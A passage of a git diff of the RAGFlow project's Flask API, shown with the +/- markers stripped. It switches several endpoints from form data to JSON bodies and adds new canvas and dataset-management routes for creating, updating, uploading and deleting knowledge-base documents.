                    chunk_i['doc_name'] = chunk_i['docnm_kwd']
                    chunk_i.pop('docnm_kwd')
                yield "data:"+json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
                rename_field(ans)
                yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
            API4ConversationService.append_message(conv.id, conv.to_dict())
        except Exception as e:
            yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
@ -375,19 +378,19 @@ def list_chunks():
        return get_json_result(
            data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)

    form_data = request.form
    req = request.json

    try:
        if "doc_name" in form_data.keys():
            tenant_id = DocumentService.get_tenant_id_by_name(form_data['doc_name'])
            doc_id = DocumentService.get_doc_id_by_doc_name(form_data['doc_name'])
        if "doc_name" in req.keys():
            tenant_id = DocumentService.get_tenant_id_by_name(req['doc_name'])
            doc_id = DocumentService.get_doc_id_by_doc_name(req['doc_name'])

        elif "doc_id" in form_data.keys():
            tenant_id = DocumentService.get_tenant_id(form_data['doc_id'])
            doc_id = form_data['doc_id']
        elif "doc_id" in req.keys():
            tenant_id = DocumentService.get_tenant_id(req['doc_id'])
            doc_id = req['doc_id']
        else:
            return get_json_result(
                data=False,retmsg="Can't find doc_name or doc_id"
                data=False, retmsg="Can't find doc_name or doc_id"
            )

        res = retrievaler.chunk_list(doc_id=doc_id, tenant_id=tenant_id)
@ -414,8 +417,9 @@ def list_kb_docs():
        return get_json_result(
            data=False, retmsg='Token is not valid!"', retcode=RetCode.AUTHENTICATION_ERROR)

    req = request.json
    tenant_id = objs[0].tenant_id
    kb_name = request.form.get("kb_name").strip()
    kb_name = req.get("kb_name", "").strip()

    try:
        e, kb = KnowledgebaseService.get_by_name(kb_name, tenant_id)
@ -427,11 +431,11 @@ def list_kb_docs():
    except Exception as e:
        return server_error_response(e)

    page_number = int(request.form.get("page", 1))
    items_per_page = int(request.form.get("page_size", 15))
    orderby = request.form.get("orderby", "create_time")
    desc = request.form.get("desc", True)
    keywords = request.form.get("keywords", "")
    page_number = int(req.get("page", 1))
    items_per_page = int(req.get("page_size", 15))
    orderby = req.get("orderby", "create_time")
    desc = req.get("desc", True)
    keywords = req.get("keywords", "")

    try:
        docs, tol = DocumentService.get_by_kb_id(
@ -553,23 +557,24 @@ def completion_faq():
                "content": ""
            }
        ]
        for ans in chat(dia, msg, stream=False, **req):
            # answer = ans
            data[0]["content"] += re.sub(r'##\d\$\$', '', ans["answer"])
            fillin_conv(ans)
            API4ConversationService.append_message(conv.id, conv.to_dict())

            chunk_idxs = [int(match[2]) for match in re.findall(r'##\d\$\$', ans["answer"])]
            for chunk_idx in chunk_idxs[:1]:
                if ans["reference"]["chunks"][chunk_idx]["img_id"]:
                    try:
                        bkt, nm = ans["reference"]["chunks"][chunk_idx]["img_id"].split("-")
                        response = MINIO.get(bkt, nm)
                        data_type_picture["url"] = base64.b64encode(response).decode('utf-8')
                        data.append(data_type_picture)
                    except Exception as e:
                        return server_error_response(e)
        ans = ""
        for a in chat(dia, msg, stream=False, **req):
            ans = a
            break
        data[0]["content"] += re.sub(r'##\d\$\$', '', ans["answer"])
        fillin_conv(ans)
        API4ConversationService.append_message(conv.id, conv.to_dict())

        chunk_idxs = [int(match[2]) for match in re.findall(r'##\d\$\$', ans["answer"])]
        for chunk_idx in chunk_idxs[:1]:
            if ans["reference"]["chunks"][chunk_idx]["img_id"]:
                try:
                    bkt, nm = ans["reference"]["chunks"][chunk_idx]["img_id"].split("-")
                    response = MINIO.get(bkt, nm)
                    data_type_picture["url"] = base64.b64encode(response).decode('utf-8')
                    data.append(data_type_picture)
                except Exception as e:
                    return server_error_response(e)

        response = {"code": 200, "msg": "success", "data": data}
        return response
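The list_chunks and list_kb_docs changes above switch these endpoints from form fields to a JSON request body. A hedged sketch of what a caller might look like after the change; the host, route, and token header are assumptions for illustration, not confirmed by this diff:

```py
import requests

# Hypothetical call; adjust host, route, and token to your deployment.
resp = requests.post(
    "http://127.0.0.1:9380/v1/api/list_chunks",
    headers={"Authorization": "Bearer <API_TOKEN>"},
    json={"doc_name": "example.pdf"},  # or {"doc_id": "..."} per the branch above
)
print(resp.json())
```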
api/apps/canvas_app.py (new file): 162 changed lines
@ -0,0 +1,162 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
from functools import partial

from flask import request, Response
from flask_login import login_required, current_user

from api.db.db_models import UserCanvas
from api.db.services.canvas_service import CanvasTemplateService, UserCanvasService
from api.utils import get_uuid
from api.utils.api_utils import get_json_result, server_error_response, validate_request
from graph.canvas import Canvas


@manager.route('/templates', methods=['GET'])
@login_required
def templates():
    return get_json_result(data=[c.to_dict() for c in CanvasTemplateService.get_all()])


@manager.route('/list', methods=['GET'])
@login_required
def canvas_list():
    return get_json_result(data=sorted([c.to_dict() for c in \
        UserCanvasService.query(user_id=current_user.id)], key=lambda x: x["update_time"]*-1)
    )


@manager.route('/rm', methods=['POST'])
@validate_request("canvas_ids")
@login_required
def rm():
    for i in request.json["canvas_ids"]:
        UserCanvasService.delete_by_id(i)
    return get_json_result(data=True)


@manager.route('/set', methods=['POST'])
@validate_request("dsl", "title")
@login_required
def save():
    req = request.json
    req["user_id"] = current_user.id
    if not isinstance(req["dsl"], str): req["dsl"] = json.dumps(req["dsl"], ensure_ascii=False)

    req["dsl"] = json.loads(req["dsl"])
    if "id" not in req:
        if UserCanvasService.query(user_id=current_user.id, title=req["title"].strip()):
            return server_error_response(ValueError("Duplicated title."))
        req["id"] = get_uuid()
        if not UserCanvasService.save(**req):
            return server_error_response("Fail to save canvas.")
    else:
        UserCanvasService.update_by_id(req["id"], req)

    return get_json_result(data=req)


@manager.route('/get/<canvas_id>', methods=['GET'])
@login_required
def get(canvas_id):
    e, c = UserCanvasService.get_by_id(canvas_id)
    if not e:
        return server_error_response("canvas not found.")
    return get_json_result(data=c.to_dict())


@manager.route('/completion', methods=['POST'])
@validate_request("id")
@login_required
def run():
    req = request.json
    stream = req.get("stream", True)
    e, cvs = UserCanvasService.get_by_id(req["id"])
    if not e:
        return server_error_response("canvas not found.")

    if not isinstance(cvs.dsl, str):
        cvs.dsl = json.dumps(cvs.dsl, ensure_ascii=False)

    final_ans = {"reference": [], "content": ""}
    try:
        canvas = Canvas(cvs.dsl, current_user.id)
        if "message" in req:
            canvas.messages.append({"role": "user", "content": req["message"]})
            canvas.add_user_input(req["message"])
        answer = canvas.run(stream=stream)
        print(canvas)
    except Exception as e:
        return server_error_response(e)

    assert answer, "Nothing. Is it over?"

    if stream:
        assert isinstance(answer, partial)

        def sse():
            nonlocal answer, cvs
            try:
                for ans in answer():
                    for k in ans.keys():
                        final_ans[k] = ans[k]
                    ans = {"answer": ans["content"], "reference": ans.get("reference", [])}
                    yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"

                canvas.messages.append({"role": "assistant", "content": final_ans["content"]})
                if final_ans.get("reference"):
                    canvas.reference.append(final_ans["reference"])
                cvs.dsl = json.loads(str(canvas))
                UserCanvasService.update_by_id(req["id"], cvs.to_dict())
            except Exception as e:
                yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
                                            "data": {"answer": "**ERROR**: " + str(e), "reference": []}},
                                           ensure_ascii=False) + "\n\n"
            yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"

        resp = Response(sse(), mimetype="text/event-stream")
        resp.headers.add_header("Cache-control", "no-cache")
        resp.headers.add_header("Connection", "keep-alive")
        resp.headers.add_header("X-Accel-Buffering", "no")
        resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
        return resp

    canvas.messages.append({"role": "assistant", "content": final_ans["content"]})
    if final_ans.get("reference"):
        canvas.reference.append(final_ans["reference"])
    cvs.dsl = json.loads(str(canvas))
    UserCanvasService.update_by_id(req["id"], cvs.to_dict())
    return get_json_result(data=req["dsl"])


@manager.route('/reset', methods=['POST'])
@validate_request("id")
@login_required
def reset():
    req = request.json
    try:
        e, user_canvas = UserCanvasService.get_by_id(req["id"])
        if not e:
            return server_error_response("canvas not found.")

        canvas = Canvas(json.dumps(user_canvas.dsl), current_user.id)
        canvas.reset()
        req["dsl"] = json.loads(str(canvas))
        UserCanvasService.update_by_id(req["id"], {"dsl": req["dsl"]})
        return get_json_result(data=req["dsl"])
    except Exception as e:
        return server_error_response(e)
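Since /completion streams Server-Sent Events, a client reads `data:` frames until the final sentinel frame whose `data` is `true`. A minimal consumer sketch, assuming the blueprint is mounted at `/v1/canvas` and that an authenticated session cookie is already available (the endpoint is `login_required`); the host and canvas id are placeholders:

```py
import json
import requests

session = requests.Session()  # assumed to already carry a logged-in cookie

resp = session.post(
    "http://127.0.0.1:9380/v1/canvas/completion",  # assumed mount point
    json={"id": "<canvas_id>", "message": "hello", "stream": True},
    stream=True,
)
for raw in resp.iter_lines(decode_unicode=True):
    if not raw or not raw.startswith("data:"):
        continue  # skip blank keep-alive lines between SSE frames
    frame = json.loads(raw[len("data:"):])
    if frame["data"] is True:  # final sentinel emitted by sse()
        break
    print(frame["data"]["answer"])
```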
@ -20,7 +20,7 @@ from flask_login import login_required, current_user
from elasticsearch_dsl import Q

from rag.app.qa import rmPrefix, beAdoc
from rag.nlp import search, rag_tokenizer
from rag.nlp import search, rag_tokenizer, keyword_extraction
from rag.utils.es_conn import ELASTICSEARCH
from rag.utils import rmSpace
from api.db import LLMType, ParserType
@ -136,8 +136,11 @@ def set():
        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
        if not tenant_id:
            return get_data_error_result(retmsg="Tenant not found!")

        embd_id = DocumentService.get_embd_id(req["doc_id"])
        embd_mdl = TenantLLMService.model_instance(
            tenant_id, LLMType.EMBEDDING.value)
            tenant_id, LLMType.EMBEDDING.value, embd_id)

        e, doc = DocumentService.get_by_id(req["doc_id"])
        if not e:
            return get_data_error_result(retmsg="Document not found!")
@ -221,9 +224,11 @@ def create():
        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
        if not tenant_id:
            return get_data_error_result(retmsg="Tenant not found!")

        embd_id = DocumentService.get_embd_id(req["doc_id"])
        embd_mdl = TenantLLMService.model_instance(
            tenant_id, LLMType.EMBEDDING.value)
            tenant_id, LLMType.EMBEDDING.value, embd_id)

        v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
        DocumentService.increment_chunk_num(req["doc_id"], doc.kb_id, c, 1, 0)
        v = 0.1 * v[0] + 0.9 * v[1]
@ -263,6 +268,10 @@ def retrieval_test():
            rerank_mdl = TenantLLMService.model_instance(
                kb.tenant_id, LLMType.RERANK.value, llm_name=req["rerank_id"])

        if req.get("keyword", False):
            chat_mdl = TenantLLMService.model_instance(kb.tenant_id, LLMType.CHAT)
            question += keyword_extraction(chat_mdl, question)

        ranks = retrievaler.retrieval(question, embd_mdl, kb.tenant_id, [kb_id], page, size,
                                      similarity_threshold, vector_similarity_weight, top,
                                      doc_ids, rerank_mdl=rerank_mdl)

@ -13,7 +13,8 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
from flask import request, Response, jsonify
from copy import deepcopy
from flask import request, Response
from flask_login import login_required
from api.db.services.dialog_service import DialogService, ConversationService, chat
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
@ -121,7 +122,7 @@ def completion():
    e, conv = ConversationService.get_by_id(req["conversation_id"])
    if not e:
        return get_data_error_result(retmsg="Conversation not found!")
    conv.message.append(msg[-1])
    conv.message.append(deepcopy(msg[-1]))
    e, dia = DialogService.get_by_id(conv.dialog_id)
    if not e:
        return get_data_error_result(retmsg="Dialog not found!")
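The `deepcopy(msg[-1])` change above is an aliasing fix: appending `msg[-1]` directly stores the same dict object in `conv.message`, so any later in-place edit to the message mutates the stored conversation as well. A minimal illustration:

```py
from copy import deepcopy

msg = [{"role": "user", "content": "hi"}]

stored = [msg[-1]]             # old behavior: both lists share one dict
msg[-1]["content"] = "edited"
print(stored[0]["content"])    # -> "edited": the stored message changed too

msg = [{"role": "user", "content": "hi"}]
stored = [deepcopy(msg[-1])]   # new behavior: an independent copy is stored
msg[-1]["content"] = "edited"
print(stored[0]["content"])    # -> "hi": the stored message is unaffected
```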
api/apps/dataset_api.py (new file): 615 changed lines
@ -0,0 +1,615 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
import os
|
||||
import pathlib
|
||||
import re
|
||||
import warnings
|
||||
from io import BytesIO
|
||||
|
||||
from flask import request, send_file
|
||||
from flask_login import login_required, current_user
|
||||
from httpx import HTTPError
|
||||
from minio import S3Error
|
||||
|
||||
from api.contants import NAME_LENGTH_LIMIT
|
||||
from api.db import FileType, ParserType, FileSource
|
||||
from api.db import StatusEnum
|
||||
from api.db.db_models import File
|
||||
from api.db.services import duplicate_name
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.file2document_service import File2DocumentService
|
||||
from api.db.services.file_service import FileService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.user_service import TenantService
|
||||
from api.settings import RetCode
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import construct_json_result, construct_error_response
|
||||
from api.utils.api_utils import construct_result, validate_request
|
||||
from api.utils.file_utils import filename_type, thumbnail
|
||||
from rag.utils.minio_conn import MINIO
|
||||
|
||||
MAXIMUM_OF_UPLOADING_FILES = 256
|
||||
|
||||
# ------------------------------ create a dataset ---------------------------------------
|
||||
|
||||
@manager.route("/", methods=["POST"])
|
||||
@login_required # use login
|
||||
@validate_request("name") # check name key
|
||||
def create_dataset():
|
||||
# Check if Authorization header is present
|
||||
authorization_token = request.headers.get("Authorization")
|
||||
if not authorization_token:
|
||||
return construct_json_result(code=RetCode.AUTHENTICATION_ERROR, message="Authorization header is missing.")
|
||||
|
||||
# TODO: Login or API key
|
||||
# objs = APIToken.query(token=authorization_token)
|
||||
#
|
||||
# # Authorization error
|
||||
# if not objs:
|
||||
# return construct_json_result(code=RetCode.AUTHENTICATION_ERROR, message="Token is invalid.")
|
||||
#
|
||||
# tenant_id = objs[0].tenant_id
|
||||
|
||||
tenant_id = current_user.id
|
||||
request_body = request.json
|
||||
|
||||
# In case that there's no name
|
||||
if "name" not in request_body:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Expected 'name' field in request body")
|
||||
|
||||
dataset_name = request_body["name"]
|
||||
|
||||
# empty dataset_name
|
||||
if not dataset_name:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Empty dataset name")
|
||||
|
||||
# In case that there's space in the head or the tail
|
||||
dataset_name = dataset_name.strip()
|
||||
|
||||
# In case that the length of the name exceeds the limit
|
||||
dataset_name_length = len(dataset_name)
|
||||
if dataset_name_length > NAME_LENGTH_LIMIT:
|
||||
return construct_json_result(
|
||||
code=RetCode.DATA_ERROR,
|
||||
message=f"Dataset name: {dataset_name} with length {dataset_name_length} exceeds {NAME_LENGTH_LIMIT}!")
|
||||
|
||||
# In case that there are other fields in the data-binary
|
||||
if len(request_body.keys()) > 1:
|
||||
name_list = []
|
||||
for key_name in request_body.keys():
|
||||
if key_name != "name":
|
||||
name_list.append(key_name)
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message=f"fields: {name_list}, are not allowed in request body.")
|
||||
|
||||
# If there is a duplicate name, it will modify it to make it unique
|
||||
request_body["name"] = duplicate_name(
|
||||
KnowledgebaseService.query,
|
||||
name=dataset_name,
|
||||
tenant_id=tenant_id,
|
||||
status=StatusEnum.VALID.value)
|
||||
try:
|
||||
request_body["id"] = get_uuid()
|
||||
request_body["tenant_id"] = tenant_id
|
||||
request_body["created_by"] = tenant_id
|
||||
exist, t = TenantService.get_by_id(tenant_id)
|
||||
if not exist:
|
||||
return construct_result(code=RetCode.AUTHENTICATION_ERROR, message="Tenant not found.")
|
||||
request_body["embd_id"] = t.embd_id
|
||||
if not KnowledgebaseService.save(**request_body):
|
||||
# failed to create new dataset
|
||||
return construct_result()
|
||||
return construct_json_result(code=RetCode.SUCCESS,
|
||||
data={"dataset_name": request_body["name"], "dataset_id": request_body["id"]})
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
# -----------------------------list datasets-------------------------------------------------------
|
||||
|
||||
@manager.route("/", methods=["GET"])
|
||||
@login_required
|
||||
def list_datasets():
|
||||
offset = request.args.get("offset", 0)
|
||||
count = request.args.get("count", -1)
|
||||
orderby = request.args.get("orderby", "create_time")
|
||||
desc = request.args.get("desc", True)
|
||||
try:
|
||||
tenants = TenantService.get_joined_tenants_by_user_id(current_user.id)
|
||||
datasets = KnowledgebaseService.get_by_tenant_ids_by_offset(
|
||||
[m["tenant_id"] for m in tenants], current_user.id, int(offset), int(count), orderby, desc)
|
||||
return construct_json_result(data=datasets, code=RetCode.SUCCESS, message=f"List datasets successfully!")
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
except HTTPError as http_err:
|
||||
return construct_json_result(http_err)
|
||||
|
||||
# ---------------------------------delete a dataset ----------------------------
|
||||
|
||||
@manager.route("/<dataset_id>", methods=["DELETE"])
|
||||
@login_required
|
||||
def remove_dataset(dataset_id):
|
||||
try:
|
||||
datasets = KnowledgebaseService.query(created_by=current_user.id, id=dataset_id)
|
||||
|
||||
# according to the id, searching for the dataset
|
||||
if not datasets:
|
||||
return construct_json_result(message=f"The dataset cannot be found for your current account.",
|
||||
code=RetCode.OPERATING_ERROR)
|
||||
|
||||
# Iterating the documents inside the dataset
|
||||
for doc in DocumentService.query(kb_id=dataset_id):
|
||||
if not DocumentService.remove_document(doc, datasets[0].tenant_id):
|
||||
# the process of deleting failed
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message="There was an error during the document removal process. "
|
||||
"Please check the status of the RAGFlow server and try the removal again.")
|
||||
# delete the other files
|
||||
f2d = File2DocumentService.get_by_document_id(doc.id)
|
||||
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
|
||||
File2DocumentService.delete_by_document_id(doc.id)
|
||||
|
||||
# delete the dataset
|
||||
if not KnowledgebaseService.delete_by_id(dataset_id):
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="There was an error during the dataset removal process. "
|
||||
"Please check the status of the RAGFlow server and try the removal again.")
|
||||
# success
|
||||
return construct_json_result(code=RetCode.SUCCESS, message=f"Remove dataset: {dataset_id} successfully")
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
# ------------------------------ get details of a dataset ----------------------------------------
|
||||
|
||||
@manager.route("/<dataset_id>", methods=["GET"])
|
||||
@login_required
|
||||
def get_dataset(dataset_id):
|
||||
try:
|
||||
dataset = KnowledgebaseService.get_detail(dataset_id)
|
||||
if not dataset:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Can't find this dataset!")
|
||||
return construct_json_result(data=dataset, code=RetCode.SUCCESS)
|
||||
except Exception as e:
|
||||
return construct_json_result(e)
|
||||
|
||||
# ------------------------------ update a dataset --------------------------------------------
|
||||
|
||||
@manager.route("/<dataset_id>", methods=["PUT"])
|
||||
@login_required
|
||||
def update_dataset(dataset_id):
|
||||
req = request.json
|
||||
try:
|
||||
# the request cannot be empty
|
||||
if not req:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Please input at least one parameter that "
|
||||
"you want to update!")
|
||||
# check whether the dataset can be found
|
||||
if not KnowledgebaseService.query(created_by=current_user.id, id=dataset_id):
|
||||
return construct_json_result(message=f"Only the owner of knowledgebase is authorized for this operation!",
|
||||
code=RetCode.OPERATING_ERROR)
|
||||
|
||||
exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
|
||||
# check whether there is this dataset
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="This dataset cannot be found!")
|
||||
|
||||
if "name" in req:
|
||||
name = req["name"].strip()
|
||||
# check whether there is duplicate name
|
||||
if name.lower() != dataset.name.lower() \
|
||||
and len(KnowledgebaseService.query(name=name, tenant_id=current_user.id,
|
||||
status=StatusEnum.VALID.value)) > 1:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message=f"The name: {name.lower()} is already used by other "
|
||||
f"datasets. Please choose a different name.")
|
||||
|
||||
dataset_updating_data = {}
|
||||
chunk_num = req.get("chunk_num")
|
||||
# modify the value of 11 parameters
|
||||
|
||||
# 2 parameters: embedding id and chunk method
|
||||
# only if chunk_num is 0, the user can update the embedding id
|
||||
if req.get("embedding_model_id"):
|
||||
if chunk_num == 0:
|
||||
dataset_updating_data["embd_id"] = req["embedding_model_id"]
|
||||
else:
|
||||
construct_json_result(code=RetCode.DATA_ERROR, message="You have already parsed the document in this "
|
||||
"dataset, so you cannot change the embedding "
|
||||
"model.")
|
||||
# only if chunk_num is 0, the user can update the chunk_method
|
||||
if req.get("chunk_method"):
|
||||
if chunk_num == 0:
|
||||
dataset_updating_data['parser_id'] = req["chunk_method"]
|
||||
else:
|
||||
construct_json_result(code=RetCode.DATA_ERROR, message="You have already parsed the document "
|
||||
"in this dataset, so you cannot "
|
||||
"change the chunk method.")
|
||||
# convert the photo parameter to avatar
|
||||
if req.get("photo"):
|
||||
dataset_updating_data["avatar"] = req["photo"]
|
||||
|
||||
# layout_recognize
|
||||
if "layout_recognize" in req:
|
||||
if "parser_config" not in dataset_updating_data:
|
||||
dataset_updating_data['parser_config'] = {}
|
||||
dataset_updating_data['parser_config']['layout_recognize'] = req['layout_recognize']
|
||||
|
||||
# TODO: updating use_raptor needs to construct a class
|
||||
|
||||
# 6 parameters
|
||||
for key in ["name", "language", "description", "permission", "id", "token_num"]:
|
||||
if key in req:
|
||||
dataset_updating_data[key] = req.get(key)
|
||||
|
||||
# update
|
||||
if not KnowledgebaseService.update_by_id(dataset.id, dataset_updating_data):
|
||||
return construct_json_result(code=RetCode.OPERATING_ERROR, message="Failed to update! "
|
||||
"Please check the status of RAGFlow "
|
||||
"server and try again!")
|
||||
|
||||
exist, dataset = KnowledgebaseService.get_by_id(dataset.id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Failed to get the dataset "
|
||||
"using the dataset ID.")
|
||||
|
||||
return construct_json_result(data=dataset.to_json(), code=RetCode.SUCCESS)
|
||||
except Exception as e:
|
||||
return construct_error_response(e)


# --------------------------------content management ----------------------------------------------

# ----------------------------upload files-----------------------------------------------------
@manager.route("/<dataset_id>/documents/", methods=["POST"])
@login_required
def upload_documents(dataset_id):
    # no files
    if not request.files:
        return construct_json_result(
            message="There is no file!", code=RetCode.ARGUMENT_ERROR)

    # the number of uploading files exceeds the limit
    file_objs = request.files.getlist("file")
    num_file_objs = len(file_objs)

    if num_file_objs > MAXIMUM_OF_UPLOADING_FILES:
        return construct_json_result(code=RetCode.DATA_ERROR,
                                     message=f"You try to upload {num_file_objs} files, which exceeds "
                                             f"the maximum number of uploading files: {MAXIMUM_OF_UPLOADING_FILES}")

    # no dataset
    exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
    if not exist:
        return construct_json_result(message="Can't find this dataset", code=RetCode.DATA_ERROR)

    for file_obj in file_objs:
        file_name = file_obj.filename
        # no name
        if not file_name:
            return construct_json_result(
                message="There is a file without name!", code=RetCode.ARGUMENT_ERROR)

        # TODO: support remote files
        if 'http' in file_name:
            return construct_json_result(code=RetCode.ARGUMENT_ERROR, message="Remote files are not supported yet.")

    # get the root_folder
    root_folder = FileService.get_root_folder(current_user.id)
    # get the id of the root_folder
    parent_file_id = root_folder["id"]  # document id
    # this is for the new user: create the '.knowledgebase' folder
    FileService.init_knowledgebase_docs(parent_file_id, current_user.id)
    # go inside this folder, get the kb_root_folder
    kb_root_folder = FileService.get_kb_folder(current_user.id)
    # link the file management to the kb_folder
    kb_folder = FileService.new_a_file_from_kb(dataset.tenant_id, dataset.name, kb_root_folder["id"])

    # grab all the errors
    err = []
    MAX_FILE_NUM_PER_USER = int(os.environ.get("MAX_FILE_NUM_PER_USER", 0))
    uploaded_docs_json = []
    for file in file_objs:
        try:
            # TODO: get this value from the database as some tenants have this limit while others don't
            if MAX_FILE_NUM_PER_USER > 0 and DocumentService.get_doc_count(dataset.tenant_id) >= MAX_FILE_NUM_PER_USER:
                return construct_json_result(code=RetCode.DATA_ERROR,
                                             message="Exceed the maximum file number of a free user!")
            # deal with the duplicate name
            filename = duplicate_name(
                DocumentService.query,
                name=file.filename,
                kb_id=dataset.id)

            # deal with the unsupported type
            filetype = filename_type(filename)
            if filetype == FileType.OTHER.value:
                return construct_json_result(code=RetCode.DATA_ERROR,
                                             message="This type of file has not been supported yet!")

            # upload to MinIO
            location = filename
            while MINIO.obj_exist(dataset_id, location):
                location += "_"

            blob = file.read()
            # the content is empty, raising a warning
            if blob == b'':
                warnings.warn(f"[WARNING]: The file {filename} is empty.")

            MINIO.put(dataset_id, location, blob)

            doc = {
                "id": get_uuid(),
                "kb_id": dataset.id,
                "parser_id": dataset.parser_id,
                "parser_config": dataset.parser_config,
                "created_by": current_user.id,
                "type": filetype,
                "name": filename,
                "location": location,
                "size": len(blob),
                "thumbnail": thumbnail(filename, blob)
            }
            if doc["type"] == FileType.VISUAL:
                doc["parser_id"] = ParserType.PICTURE.value
            if re.search(r"\.(ppt|pptx|pages)$", filename):
                doc["parser_id"] = ParserType.PRESENTATION.value
            DocumentService.insert(doc)

            FileService.add_file_from_kb(doc, kb_folder["id"], dataset.tenant_id)
            uploaded_docs_json.append(doc)
        except Exception as e:
            err.append(file.filename + ": " + str(e))

    if err:
        # return all the errors
        return construct_json_result(message="\n".join(err), code=RetCode.SERVER_ERROR)
    # success
    return construct_json_result(data=uploaded_docs_json, code=RetCode.SUCCESS)
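
# A hedged usage sketch for the upload route above; the host, port, and login flow
# are assumptions. Flask's request.files.getlist("file") collects every part named
# "file", so several files can travel in one request:
#
#     import requests
#
#     session = requests.Session()
#     # ... authenticate first so that @login_required passes (details omitted) ...
#     dataset_id = "DATASET_ID"  # placeholder
#     with open("report.pdf", "rb") as f1, open("notes.docx", "rb") as f2:
#         resp = session.post(
#             f"http://localhost:9380/dataset/{dataset_id}/documents/",
#             files=[("file", f1), ("file", f2)],  # both parts share the field name "file"
#         )
#     print(resp.json())  # SUCCESS with the uploaded docs, or the collected per-file errors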


# ----------------------------delete a file-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>", methods=["DELETE"])
@login_required
def delete_document(document_id, dataset_id):  # string
    # get the root folder
    root_folder = FileService.get_root_folder(current_user.id)
    # parent file's id
    parent_file_id = root_folder["id"]
    # consider the new user
    FileService.init_knowledgebase_docs(parent_file_id, current_user.id)
    # store all the errors that may occur
    errors = ""
    try:
        # whether this document exists
        exist, doc = DocumentService.get_by_id(document_id)
        if not exist:
            return construct_json_result(message=f"Document {document_id} not found!", code=RetCode.DATA_ERROR)
        # whether this doc is authorized by this tenant
        tenant_id = DocumentService.get_tenant_id(document_id)
        if not tenant_id:
            return construct_json_result(
                message=f"You cannot delete this document {document_id} for authorization reasons!",
                code=RetCode.AUTHENTICATION_ERROR)

        # get the doc's dataset id and its location in MinIO
        real_dataset_id, location = File2DocumentService.get_minio_address(doc_id=document_id)

        if real_dataset_id != dataset_id:
            return construct_json_result(message=f"The document {document_id} is not in the dataset: {dataset_id}, "
                                                 f"but in the dataset: {real_dataset_id}.", code=RetCode.ARGUMENT_ERROR)

        # there is an issue when removing
        if not DocumentService.remove_document(doc, tenant_id):
            return construct_json_result(
                message="There was an error during the document removal process. Please check the status of the "
                        "RAGFlow server and try the removal again.", code=RetCode.OPERATING_ERROR)

        # fetch the File2Document record associated with the provided document ID.
        file_to_doc = File2DocumentService.get_by_document_id(document_id)
        # delete the associated File record.
        FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == file_to_doc[0].file_id])
        # delete the File2Document record itself using the document ID. This removes the
        # association between the document and the file after the File record has been deleted.
        File2DocumentService.delete_by_document_id(document_id)

        # delete it from MinIO
        MINIO.rm(dataset_id, location)
    except Exception as e:
        errors += str(e)
    if errors:
        return construct_json_result(data=False, message=errors, code=RetCode.SERVER_ERROR)

    return construct_json_result(data=True, code=RetCode.SUCCESS)


# ----------------------------list files-----------------------------------------------------
@manager.route('/<dataset_id>/documents/', methods=['GET'])
@login_required
def list_documents(dataset_id):
    if not dataset_id:
        return construct_json_result(
            data=False, message="Lack of 'dataset_id'", code=RetCode.ARGUMENT_ERROR)

    # searching keywords
    keywords = request.args.get("keywords", "")

    offset = request.args.get("offset", 0)
    count = request.args.get("count", -1)
    order_by = request.args.get("order_by", "create_time")
    descend = request.args.get("descend", True)
    try:
        docs, total = DocumentService.list_documents_in_dataset(dataset_id, int(offset), int(count), order_by,
                                                                descend, keywords)

